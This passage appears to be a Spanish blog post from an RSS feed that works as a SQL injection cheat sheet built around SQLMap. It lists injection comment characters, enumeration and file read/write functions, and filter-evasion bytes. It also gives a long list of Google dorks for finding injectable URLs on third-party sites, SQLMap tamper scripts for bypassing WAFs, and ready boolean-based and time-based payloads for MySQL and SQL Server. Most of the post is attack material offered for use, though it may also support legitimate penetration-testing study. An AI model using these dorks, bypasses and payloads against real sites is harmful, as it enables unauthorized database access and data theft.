<p>SQLMap compara la página sin ningún tipo inyección con la página con la inyección y en función de la variación entre ellas devuelve True o False (True si supera determinado ratio y False en el caso contrario).</p>
<p>Los siguientes carácteres pueden ser usados después de la inyección SQL:</p>
<blockquote class="tr_bq">
<table>
<tbody>
<tr>
<td class="code">#</td>
<td>Hash comment</td>
</tr>
<tr>
<td class="code">/*</td>
<td>C-style comment</td>
</tr>
<tr>
<td class="code">&#8212; &#8211;</td>
<td>SQL comment</td>
</tr>
<tr>
<td class="code">;</td>
<td>Nullbyte</td>
</tr>
<tr>
<td class="code">`</td>
<td>Backtick</td>
</tr>
</tbody>
</table>
</blockquote>
<p>Saber la versión del servidor SQL:</p>
<p>Enumeración.</p>
<p>Con SQLMap:</p>
<ul>
<li><strong><code>--all</code></strong></li>
<li><strong><code>-b</code></strong> o <code><strong>--banner</strong> (versión)</code></li>
<li><strong><code>--current-user</code></strong></li>
<li><strong><code>--current-db</code></strong></li>
<li><code><strong><code>--hostname</code></strong> </code></li>
</ul>
<blockquote class="tr_bq"><p>VERSION()<br />
@@VERSION<br />
@@GLOBAL.VERSION</p></blockquote>
<p>Información relevante:</p>
<blockquote class="tr_bq"><p>@@HOSTNAME<br />
UUID() &#8211;&gt; MAC address</p></blockquote>
<p>Condicionales</p>
<blockquote class="tr_bq"><p>&nbsp;</p>
<table>
<tbody>
<tr>
<td class="code">CASE</td>
</tr>
<tr>
<td class="code">IF()</td>
</tr>
<tr>
<td class="code">IFNULL()</td>
</tr>
<tr>
<td class="code">NULLIF()</td>
</tr>
</tbody>
</table>
</blockquote>
<p>Leyendo ficheros:</p>
<p>Con SQLMap:</p>
<ul>
<li><strong><code>--file-read=</code></strong></li>
<li><strong><code>--file-write=</code></strong></li>
<li><strong><code>--file-dest=</code></strong></li>
</ul>
<p>&nbsp;</p>
<blockquote class="tr_bq"><p>LOAD_FILE()<br />
INTO OUTFILE/DUMPFILE</p></blockquote>
<p>Ofuscación (Evadiendo filtros)</p>
<blockquote class="tr_bq"><p>09 Horizontal Tab<br />
0A New Line<br />
0B Vertical Tab<br />
0C New Page<br />
0D Carriage Return<br />
A0 Non-breaking Space<br />
20 Space</p></blockquote>
<p>Carácteres admitidos después del AND/OR</p>
<blockquote class="tr_bq"><p>20 Space<br />
2B +<br />
2D &#8211;<br />
7E ~<br />
21 !<br />
40 @</p></blockquote>
<h2> Google Dorks</h2>
<p>&nbsp;</p>
<ul>
<li><strong>-g</strong> GOOGLEDORK</li>
</ul>
<p>Ejemplos:</p>
<blockquote class="tr_bq"><p>inurl:item_id=  inurl:review.php?id=  inurl:hosting_info.php?id=<br />
inurl:newsid=  inurl:iniziativa.php?in=  inurl:gallery.php?id=<br />
inurl:trainers.php?id=  inurl:curriculum.php?id=  inurl:rub.php?idr=<br />
inurl:news-full.php?id=  inurl:labels.php?id=  inurl:view_faq.php?id=<br />
inurl:news_display.php?getid=  inurl:story.php?id=  inurl:artikelinfo.php?id=<br />
inurl:index2.php?option=  inurl:look.php?ID=  inurl:detail.php?ID=<br />
inurl:readnews.php?id=  inurl:newsone.php?id=  inurl:index.php?=<br />
inurl:top10.php?cat=  inurl:aboutbook.php?id=  inurl:profile_view.php?id=<br />
inurl:newsone.php?id=  inurl:material.php?id=  inurl:category.php?id=<br />
inurl:event.php?id=  inurl:opinions.php?id=  inurl:publications.php?id=<br />
inurl:product-item.php?id=  inurl:announce.php?id=  inurl:fellows.php?id=<br />
inurl:sql.php?id=  inurl:rub.php?idr=  inurl:downloads_info.php?id=<br />
inurl:index.php?catid=  inurl:galeri_info.php?l=  inurl:prod_info.php?id=<br />
inurl:news.php?catid=  inurl:tekst.php?idt=  inurl:shop.php?do=part&amp;id=<br />
inurl:index.php?id=  inurl:newscat.php?id=  inurl:productinfo.php?id=<br />
inurl:news.php?id=  inurl:newsticker_info.php?idn=  inurl:collectionitem.php?id=<br />
inurl:index.php?id=  inurl:rubrika.php?idr=  inurl:band_info.php?id=<br />
inurl:trainers.php?id=  inurl:rubp.php?idr=  inurl:product.php?id=<br />
inurl:buy.php?category=  inurl:offer.php?idf=  inurl:releases.php?id=<br />
inurl:article.php?ID=  inurl:art.php?idm=  inurl:ray.php?id=<br />
inurl:play_old.php?id=  inurl:title.php?id=  inurl:produit.php?id=<br />
inurl:declaration_more.php?decl_id=  inurl:news_view.php?id=  inurl:pop.php?id=<br />
inurl:pageid=  inurl:select_biblio.php?id=  inurl:shopping.php?id=<br />
inurl:games.php?id=  inurl:humor.php?id=  inurl:productdetail.php?id=<br />
inurl:page.php?file=  inurl:aboutbook.php?id=  inurl:post.php?id=<br />
inurl:newsDetail.php?id=  inurl:ogl_inet.php?ogl_id=  inurl:viewshowdetail.php?id=<br />
inurl:gallery.php?id=  inurl:fiche_spectacle.php?id=  inurl:clubpage.php?id=<br />
inurl:article.php?id=  inurl:communique_detail.php?id=  inurl:memberInfo.php?id=<br />
inurl:show.php?id=  inurl:sem.php3?id=  inurl:section.php?id=<br />
inurl:staff_id=  inurl:kategorie.php4?id=  inurl:theme.php?id=<br />
inurl:newsitem.php?num=  inurl:news.php?id=  inurl:page.php?id=<br />
inurl:readnews.php?id=  inurl:index.php?id=  inurl:shredder-categories.php?id=<br />
inurl:top10.php?cat=  inurl:faq2.php?id=  inurl:tradeCategory.php?id=<br />
inurl:historialeer.php?num=  inurl:show_an.php?id=  inurl:product_ranges_view.php?ID=<br />
inurl:reagir.php?num=  inurl:preview.php?id=  inurl:shop_category.php?id=<br />
inurl:Stray-Questions-View.php?num=  inurl:loadpsb.php?id=  inurl:transcript.php?id=<br />
inurl:forum_bds.php?num=  inurl:opinions.php?id=  inurl:channel_id=<br />
inurl:game.php?id=  inurl:spr.php?id=  inurl:aboutbook.php?id=<br />
inurl:view_product.php?id=  inurl:pages.php?id=  inurl:preview.php?id=<br />
inurl:newsone.php?id=  inurl:announce.php?id=  inurl:loadpsb.php?id=<br />
inurl:sw_comment.php?id=  inurl:clanek.php4?id=  inurl:pages.php?id=<br />
inurl:news.php?id=  inurl:participant.php?id=  inurl:avd_start.php?avd=  inurl:download.php?id= inurl:event.php?id=  inurl:main.php?id=  inurl:product-item.php?id=  inurl:review.php?id=  inurl:sql.php?id=  inurl:chappies.php?id=  inurl:material.php?id=  inurl:read.php?id=  inurl:clanek.php4?id= inurl:prod_detail.php?id=  inurl:announce.php?id=  inurl:viewphoto.php?id=  inurl:chappies.php?id= inurl:article.php?id=  inurl:read.php?id=  inurl:person.php?id=  inurl:viewapp.php?id= inurl:productinfo.php?id=  inurl:viewphoto.php?id=  inurl:showimg.php?id=  inurl:rub.php?idr= inurl:view.php?id=  inurl:galeri_info.php?l=  inurl:website.php?id=</p></blockquote>
<h3>Bypass de WAF (Web Aplication Firewall) / IDS</h3>
<p>Algunos scripts que nos permite de cierta forma poder realizar un bypass a ciertos WAF/IDS como mod_security o suhosing. De esta manera podemos ocultar el playload. Estos scripts pertenecen a la herramienta SQLmap y se encuentran en la carpeta<strong> Tamper.</strong></p>
<ul>
<li><strong>&#8211;tamper </strong>: Se utiliza para seleccionar el tipo de manipulación que se efectuará a la inyección por parte del script que se selecciona a continuación.</li>
</ul>
<ul>
<li>apostrophemask.py</li>
<li>percentage.py</li>
<li>apostrophenullencode.py</li>
<li>randomcase.py</li>
<li>appendnullbyte.py</li>
<li>randomcomments.py</li>
<li>base64encode.py</li>
<li>securesphere.py</li>
<li>between.py</li>
<li>space2comment.py</li>
<li>bluecoat.py</li>
<li>space2dash.py</li>
<li>chardoubleencode.py</li>
<li>space2hash.py</li>
<li>charencode.py</li>
<li>space2morehash.py</li>
<li>charunicodeencode.py</li>
<li>space2mssqlblank.py</li>
<li>concat2concatws.py</li>
<li>space2mssqlhash.py</li>
<li>equaltolike.py</li>
<li>space2mysqlblank.py</li>
<li>greatest.py</li>
<li>space2mysqldash.py</li>
<li>halfversionedmorekeywords.py</li>
<li>space2plus.py</li>
<li>ifnull2ifisnull.py</li>
<li>space2randomblank.py</li>
<li>__init__.py</li>
<li>sp_password.py</li>
<li>lowercase.py</li>
<li>unionalltounion.py</li>
<li>modsecurityversioned.py</li>
<li>unmagicquotes.py</li>
<li>modsecurityzeroversioned.py</li>
<li>versionedkeywords.py</li>
<li>multiplespaces.py</li>
<li>versionedmorekeywords.py</li>
<li>nonrecursivereplacement.py</li>
</ul>
<p>Por ejemplo el tamper &#8220;space2morehash.py&#8221; cambian en la &#8220;URL encoded&#8221; las funciones CHAR(), USER(), CONCAT() por FUNCTION%23randomText%0A()</p>
<p>space2hash.py, space2mysqlblank.py pueden ser usados cuando el motor es MySQLy charunicodeencode.py, percentage.py opara ofuscar el playload en motores ASP/ASP.NET</p>
<p>El script charencode nos puede ser muy útil cuando atacamos un sitio web protegido por un WAF,el cual tiene prohido el ingreso de ciertas palabras como puede ser el caso de <strong>columns_name</strong>, <strong>table_name</strong>, <strong>group_concat</strong>, etc.</p>
<ul>
<li><strong>-v</strong> : Es para seleccionar el nivel de esfuerzo por parte de la herramienta : 0-6 (por defecto toma el valor de 1)</li>
<li><strong>&#8211;batch</strong> : Sirve para que el usuario no tenga la necesidad de ingresar cualquier dato una vez iniciado las inyecciones(Se obvia el ingreso de Y/N).</li>
<li><strong>&#8211;risk</strong> : Riesgo de pruebas que se desee realizar (0-3, por defecto toma el valor de 1)</li>
<li><strong>&#8211;level</strong> : Nivel de pruebas que desee realizar (1-5, por defecto toma el valor de 1)</li>
</ul>
<div></div>
<div>
<h2>Payloads</h2>
<p>Los payloads se encuentran en formato xml: ejemplo de plantilla xml/payloads.xml</p>
<p><a href="https://github.com/sqlmapproject/sqlmap/blob/master/xml/payloads.xml">https://github.com/sqlmapproject/sqlmap/blob/master/xml/payloads.xml</a></p>
<p>Boolean based</p>
<blockquote class="tr_bq"><p>999999 or 1=1 or 1=1<br />
&#8216; or 1=1 or &#8216;1&#8217;=&#8217;1<br />
&#8221; or 1=1 or &#8220;1&#8221;=&#8221;1<br />
999999) or 1=1 or (1=1<br />
&#8216;) or 1=1 or (&#8216;1&#8217;=&#8217;1<br />
&#8220;) or 1=1 or (&#8220;1&#8243;=&#8221;1<br />
999999)) or 1=1 or ((1=1<br />
&#8216;)) or 1=1 or ((&#8216;1&#8217;=&#8217;1<br />
&#8220;)) or 1=1 or ((&#8220;1&#8243;=&#8221;1<br />
999999))) or 1=1 or (((1<br />
&#8216;))) or 1=1 or (((&#8216;1&#8217;=&#8217;1<br />
&#8220;))) or 1=1 or (((&#8220;1&#8243;=&#8221;1</p></blockquote>
<p>Time-based MySQL</p>
<blockquote class="tr_bq"><p>(select benchmark(15000000,md5(0x4e446b6e))-9999) as test<br />
benchmark(15000000,md5(0x4e446b6e))-9999<br />
9999&#8242; or benchmark(15000000,md5(0x4e446b6e)) or &#8216;0&#8217;=&#8217;9999<br />
9999&#8243; or benchmark(15000000,md5(0x4e446b6e)) or &#8220;0&#8221;=&#8221;9999</p></blockquote>
<div>SQL Server (mssql)</div>
<div></div>
<div>
<blockquote class="tr_bq"><p>(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7) as test<br />
(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)<br />
9999&#8217;+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+&#8217;9999<br />
9999&#8243;+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+&#8221;9999</p></blockquote>
</div>
<div>
<h2>Sqlmap plugin for BurpSuite</h2>
<blockquote class="tr_bq"><p>Cuando auditamos un sitio web lo primero que solemos hacer es poner un proxy intermedio para tener más control sobre lo que enviamos a éste. Por diversos motivos utilizo el <a href="http://portswigger.net/burp/">BurpSuite</a> como proxy.<br />
¿No creéis que sería genial que cuando estamos auditando un sitio podamos redirigir una URL o petición concreta directamente al <a href="http://sqlmap.sourceforge.net/">sqlmap</a> con un simple <em>click</em> de ratón? Sí, ¿verdad? Eso creo yo también. Por esto he desarrollado este <em>plugin</em>, para poder hacer justamente esto.</p></blockquote>
<p>&nbsp;</p>
</div>
</div>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
